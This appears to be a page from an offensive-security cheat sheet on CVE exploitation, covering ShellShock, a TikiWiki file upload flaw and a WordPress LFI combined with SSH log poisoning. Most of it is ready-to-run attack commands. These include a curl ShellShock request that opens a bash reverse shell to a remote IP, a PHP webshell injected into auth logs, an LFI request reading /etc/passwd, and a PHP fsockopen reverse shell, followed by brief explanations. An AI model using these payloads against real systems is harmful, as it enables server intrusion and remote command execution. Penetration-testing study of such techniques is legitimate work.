LinkedIn

CVE exploitation

CGI ShellShock web vulnerabilities

https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/

LogoCGIHackTricks
# Directory Brute Forcing
gobuster dir -u http://172.25.210.128 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

# ShellShock Vulnerability Detection
nmap -n -p80 --script http-shershock --script-args uri=/cgi-bin/keygen,cmd=ls 172.25.30.5

# Reverse Shell via ShellShock Exploit
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi

# Metasploit module to detect ShellShock
multi/http/apache_mod_cgi_bash_env_exec

# Python code to detect ShellShok: https://github.com/erinzm/shellshocker
shellshocker.py [OPTIONS] URL

TikiWiki File Upload vulnerability

To exploit the TikiWiki File Upload vulnerability, use the following Metasploit command to perform an unrestricted file upload:

# Use unix/webapp/tikiwiki_upload_exec
# If you find this unrestricted file upload, you can use the msfconsole command to exploit it.
# The default login page of tikiwiki is usually admin:admin
Use unix/webapp/tikiwiki_upload_exec

Log Poisoning and LFI example CVE-2018-7422 (Wordpress)

# Inject a malicious PHP payload into SSH to store it in the auth log file
Ssh '<?php system($_GET["c"]); ?>@IP'

# Exploit a Local File Inclusion (LFI) vulnerability in WordPress (CVE-2018-7422)
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

# Combine LFI and log poisoning to get a shell, inject PHP reverse shell into a specific machine
ajax_path=var/log/auth.log&c=ifconfig

# PHP code to establish a reverse shell to a remote host
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
LogoGitHub - RoqueNight/LFI---RCE-Cheat-Sheet: Transition form local file inclusion attacks to remote code exectionGitHub

Explanation:

  • The Ssh '<?php system($_GET["c"]); ?>@IP' command illustrates injecting a PHP payload to execute commands on the target system via SSH log poisoning.

  • The LFI example shows how to access the /etc/passwd file using a vulnerable WordPress plugin, indicating a directory traversal attack.

  • Combining LFI and log poisoning involves altering application logs to include malicious PHP code, leading to code execution when the log file is included via LFI.

  • The PHP reverse shell command uses socket programming to connect back to an attacker's machine, offering a shell interface for remote command execution.

PreviouscUrl cheatsheetNextJavaScript Obfuscation/Deobfuscation

Last updated